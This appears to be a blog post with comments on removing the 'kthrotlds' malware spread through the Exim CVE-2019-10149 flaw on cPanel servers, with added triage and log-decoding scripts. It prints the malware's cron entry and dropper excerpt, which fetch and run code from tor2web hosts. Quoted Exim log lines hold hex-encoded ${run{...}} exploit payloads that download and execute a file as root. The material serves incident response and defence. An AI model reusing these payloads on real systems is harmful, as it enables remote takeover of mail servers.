kthrotlds CVE-2019-10149 Exim/cPanel

If you find a strange process named [kthrotlds] running on your server, your server may be affected by the CVE-2019-10149 Exim exploit (remote command execution in Exim 4.87 through 4.91, fixed in 4.92). The process name can differ. First of all, kill it:

pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists

Its binary is created in the /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need to quarantine it or simply remove it.

This process holds TCP connections, so it is not a kernel thread, even though the bracketed name is chosen to look like one in your process list (a real kernel thread has no executable on disk and no sockets).

While fixing this issue my advice is to stop the crond service: service crond stop

Then you should find all files which could be affected:

grep -r passwd /var/spool/cron*

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

You need to check /etc, /root and /usr/local/bin for bash/sh scripts containing malware code, like this (excerpt of the dropper):

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'

If it is a cPanel server, check the Exim version like this:

whmapi1 installed_versions packages=1|grep exim

exim: 4.91-4
– exim-4.91-4.cp1170.x86_64

or simply exim --version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02
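Added example, not code from the original post: a small classifier for the "exim --version" banner. Upstream, Exim 4.87 through 4.91 are affected by CVE-2019-10149 and 4.92 carries the fix, but vendor builds such as the cPanel RPMs keep the 4.91 version string after backporting the patch, which is why the post falls back to the build date and the RPM release tag. The function names and the status labels are my own.

```sh
#!/bin/sh
# exim_status "BANNER" -> one of: fixed, vulnerable-unless-backported,
# outside-affected-range, unknown. Only the major.minor part of the version
# is compared; a 4.91 result still needs the build date / package changelog
# checked, as the post does for the 06-Jun-2019 cPanel build.
exim_status() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^Exim version \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p')
    [ -n "$ver" ] || { echo unknown; return 1; }
    major=${ver% *}
    minor=${ver#* }
    if [ "$major" -gt 4 ] || { [ "$major" -eq 4 ] && [ "$minor" -ge 92 ]; }; then
        echo fixed
    elif [ "$major" -eq 4 ] && [ "$minor" -ge 87 ]; then
        echo vulnerable-unless-backported
    else
        echo outside-affected-range
    fi
}

# build_date "BANNER" -> the "built DD-Mon-YYYY" date from the banner, so a
# backported 4.91 can be told apart from an old 4.91 (07-Mar-2019 vs
# 06-Jun-2019 in the comments below).
build_date() {
    printf '%s\n' "$1" | sed -n 's/.*built \([0-9][0-9]-[A-Za-z][a-z][a-z]-[0-9]\{4\}\).*/\1/p'
}

# Live check, only when exim is installed on this host.
if command -v exim >/dev/null 2>&1; then
    banner=$(exim --version 2>/dev/null | head -n 1)
    echo "$banner -> $(exim_status "$banner") (built $(build_date "$banner"))"
fi
```

Run it on the mail server itself; on a cPanel box compare the printed build date with the `whmapi1 installed_versions` output above rather than trusting the 4.91 string alone.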

To patch WHM and Exim if you have an older version such as v76 or v70, first check your WHM version:

whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27

It means 78.0.27

or
cpanel_and_whm: 11.80.0.14

It means 80.0.14

vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

Then:
/scripts/upcp

Then switch back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

P.S. Also check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly, etc.

You can list all files modified during the last 5 days:
find /etc/ -mtime -5 -print

This malware script removes all your previous cron tasks, so you need to restore them from your backups and then enable the cron service again.
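Added example, not code from the original post: a triage script that puts the manual steps above (grep the cron spool, check the scripts and root's authorized_keys, find recent changes, clear the immutable bit) into functions. The indicator regex is built from the cron entry and dropper excerpt quoted earlier; the function names, the `--live` switch and the fixture paths are my own. Every function takes paths as arguments, so it can be pointed at the live system, at a mounted disk image, or at test fixtures.

```sh
#!/bin/sh
# Indicators lifted from the cron entry and the dropper script in the post.
IOC_REGEX='an7kmd2wp4xo7hpr|tor2web\.(su|io)|\.onion\.sh|/\.cache/\.ntp|kthrotlds|command -v passwd'

# hunt_iocs PATH... : prints matching file names to stderr and the number of
# matching files to stdout (grep -r descends into cron.* directories).
hunt_iocs() {
    list=$(grep -E -r -l "$IOC_REGEX" "$@" 2>/dev/null)
    if [ -z "$list" ]; then echo 0; return 0; fi
    printf '%s\n' "$list" | sed 's/^/IOC hit: /' >&2
    printf '%s\n' "$list" | grep -c .
}

# list_keys FILE : one line per key in an authorized_keys file (key type and
# comment) so an unknown key stands out. Blank and comment lines are skipped;
# entries with a leading options field such as command="..." are handled by
# scanning for the key-type token instead of assuming it is the first field.
list_keys() {
    [ -f "$1" ] || return 0
    awk 'NF == 0 || $1 ~ /^#/ { next }
         { for (i = 1; i <= NF; i++)
               if ($i ~ /^(ssh-|ecdsa-|sk-)/) {
                   printf "%s %s\n", $i, (i + 2 <= NF ? $(i + 2) : "(no comment)")
                   break
               } }' "$1"
}

# recent_files DIR DAYS : files modified within the last DAYS days (the post
# uses 5). Count to stdout, paths to stderr.
recent_files() {
    list=$(find "$1" -type f -mtime "-$2" 2>/dev/null)
    if [ -z "$list" ]; then echo 0; return 0; fi
    printf '%s\n' "$list" >&2
    printf '%s\n' "$list" | grep -c .
}

# clear_immutable PATH : remove the immutable attribute so the file can be
# emptied (the post's "chattr -R -i /root"); a no-op where chattr is missing.
clear_immutable() {
    command -v chattr >/dev/null 2>&1 || return 0
    chattr -R -i "$1" 2>/dev/null || true
}

# Live run (as root): sh triage.sh --live
if [ "${1:-}" = "--live" ]; then
    hits=$(hunt_iocs /var/spool/cron /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
                     /etc/cron.weekly /etc/cron.monthly /root /usr/local/bin /etc/hosts)
    echo "files with indicators: $hits"
    echo "keys in /root/.ssh/authorized_keys:"
    list_keys /root/.ssh/authorized_keys
    echo "files under /etc changed in the last 5 days: $(recent_files /etc 5)"
fi
```

Run it before emptying anything: the stderr listing tells you which cron files and scripts to quarantine, and `clear_immutable /root` followed by `> /root/.ssh/authorized_keys` covers the permission error discussed in the comments. Keep copies of the hits before deleting them; they are the evidence you will want later.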


12 thoughts on "kthrotlds CVE-2019-10149 Exim/cPanel"

  1. Hadi

    We have been infected, how could we remove this?
    I have stopped the cron service;
    but it is not possible to remove these files: /root/.ssh/authorized_keys
    /var/spool/cron/root file
    Thanks

    Reply
    1. Vitalijus Ryzakovas Post author

      /root/.ssh/authorized_keys is for passwordless SSH connection for the root user to access your server. So if you do not use a private key to access your server, you need to empty this file like this:
      > /root/.ssh/authorized_keys
      if you are getting an error about a permissions issue, try: chattr -R -i /root and then > /root/.ssh/authorized_keys

      same with /var/spool/cron/root, just try:
      > /var/spool/cron/root

      Reply
    1. Vitalijus Ryzakovas Post author

      Maybe it's fine if you have a standalone exim server, but it's not ok if you have cPanel or directadmin. cPanel uses its own exim RPM version:
      yum list installed | grep exim
      exim.x86_64 4.92-1.cp1180 installed

      before running some scripts from github.com make sure you have backups of the current configuration, especially the /etc files.

      directadmin uses source code, so you can update exim like this:
      /usr/local/directadmin/custombuild
      ./build update

      vi options.conf
      #Mail Settings
      exim=yes
      eximconf=yes

      Then run:
      ./build exim
      ./build exim_conf

      Reply
  2. zall e-padi

    Thank you for your information, I found it on my machine and already removed it by following your instructions.

    Please allow me to share this tutorial on my blog.

    Reply
  3. DrDaveD

    I got hit with this just over an hour before I applied the Debian patch. The first file modified was /etc/ssh/sshd_config. At around the same time the following was in the exim4 mainlog (fqdn redacted):

    2019-06-12 05:13:36 1hb0G8-0004Qa-MK <= H=(my.domain.name) [89.248.171.57] P=smtp S=824
    2019-06-12 05:13:37 1hb0G8-0004Qa-MK ** ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e10\x2e68\x2e193\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2ejfmfrjdo\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejfmfrjdo\x20\x2dn\x20\x26\x22}}@my.domain.name: Too many "Received" headers - suspected mail loop

    Reply
    1. Vitalijus Ryzakovas Post author

      Everyone can check whether the attack is still going on and find the attacker's IP address like this:

      grep wget /var/log/exim_mainlog

      2019-06-13 19:11:02 1hbSJa-00BO3f-5u <= <> H=(xxx.xxxxxx.xxx) [89.248.171.57]:60454 P=smtp S=852 for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.xxxxx.xxx
      2019-06-13 19:11:02 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1hbSJa-00BO3f-5u
      2019-06-13 19:11:02 1hbSJa-00BO3f-5u ** root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.cloxxxxxudlix.xxx: Too many "Received" headers - suspected mail loop

      This is a Remote Command Execution exploit; it allows a local user to run commands as root due to an issue in the deliver message code.

      Reply
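The log lines in the two comments above show the exploit in its raw form: the recipient local part carries a ${run{...}} string expansion whose command is hex-escaped (\x2f for "/", \x20 for a space, \x22 for a double quote) so that it passes Exim's address checks. The following is an added example, not code from the post or from either commenter: it decodes every such line in a main log back into the command Exim was made to run, together with the source IP it arrived from. The function names are my own; the sample log written to a temporary file is the line quoted by DrDaveD above, so the script runs without touching /var/log/exim_mainlog (cPanel) or /var/log/exim4/mainlog (Debian).

```sh
#!/bin/sh
# decode_run_payloads LOGFILE : prints "IP<TAB>decoded command" for every
# line that carries a ${run{...}} expansion.
decode_run_payloads() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Replace each \xHH escape with the byte it encodes; other characters
    # are copied through unchanged.
    function unhex(s,    out, i, ch) {
        out = ""
        for (i = 1; i <= length(s); i++) {
            ch = substr(s, i, 1)
            if (ch == "\\" && substr(s, i + 1, 1) == "x") {
                out = out sprintf("%c", hexval(substr(s, i + 2, 1)) * 16 + hexval(substr(s, i + 3, 1)))
                i += 3
            } else {
                out = out ch
            }
        }
        return out
    }
    {
        start = index($0, "${run{")
        if (start == 0) next
        payload = substr($0, start + 6)          # text after "${run{"
        end = index(payload, "}}")
        if (end == 0) next
        ip = "?"
        if (match($0, /\[[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\]/))
            ip = substr($0, RSTART + 1, RLENGTH - 2)
        printf "%s\t%s\n", ip, unhex(substr(payload, 1, end - 1))
    }' "$1"
}

# attacker_ips LOGFILE : distinct source IPs that delivered a ${run{ payload,
# ready for a firewall block list.
attacker_ips() {
    decode_run_payloads "$1" | cut -f1 | sort -u
}

# Sample input: the log line quoted in the comment above (fqdn redacted by
# its author), written to a temporary file for an offline run.
sample=$(mktemp)
cat > "$sample" <<'EOF'
2019-06-12 05:13:36 1hb0G8-0004Qa-MK <= H=(my.domain.name) [89.248.171.57] P=smtp S=824
2019-06-12 05:13:37 1hb0G8-0004Qa-MK ** ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e10\x2e68\x2e193\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2ejfmfrjdo\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejfmfrjdo\x20\x2dn\x20\x26\x22}}@my.domain.name: Too many "Received" headers - suspected mail loop
EOF
decode_run_payloads "$sample"
attacker_ips "$sample"
rm -f "$sample"
```

On a real server pass the live log instead of the sample: `decode_run_payloads /var/log/exim_mainlog`. The decoded command shows the download URL and the dropped file name (/root/.jfmfrjdo in the sample), which are exactly the paths to look for during cleanup; note that a line with a ${run{ payload proves an attempt, and the "** ... Too many Received headers" line proves Exim processed it, not that the download succeeded.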
  4. Chris Tong

    Hi. Thanks so much for all your help here! I have cPanel and am not finding a way to update Exim. I do a server software update in WHM, but the version remains 4.91 not 4.92. (exim-4.91-5.cp1178.x86_64).

    I’ve tried other recommendations for updating in SSH, but the version remains 4.91.

    You described how to update Exim with directadmin. Could you do the same for cPanel? I’d greatly appreciate it!

    Reply
    1. Vitalijus Ryzakovas Post author

      You can check exim version like this:

      exim --version
      Exim version 4.91 #1 built 06-Jun-2019 12:52:02

      as you can see it was built on 06-Jun-2019 and it's fine, because it's the patched version

      also you can check like this:
      whmapi1 installed_versions packages=1|grep exim
      exim: 4.91-4
      - exim-4.91-4.cp1170.x86_64

      Reply
      1. Chris Tong

        Thanks, Vitalijus.
        exim --version
        returns:
        Exim version 4.91 #1 built 07-Mar-2019 22:58:08
        It’s not the patched (June) version. And nothing I’ve tried so far seems to be able to get it upgraded to the June version. . . that’s why I was asking if you knew a direct way to do that upgrade Exim (apart from WHM/CPanel). Thanks!

        P.S. Would the Exim upgrade automatically happen if I successfully upgraded WHM/cPanel? I currently have version v78.0.23. I understand that the 78.0.27 version is patched, so I've been trying to use the WHM "Upgrade" function to upgrade to 78.0.30, but the upgrade keeps stopping at 17% through. Thanks.

        Reply
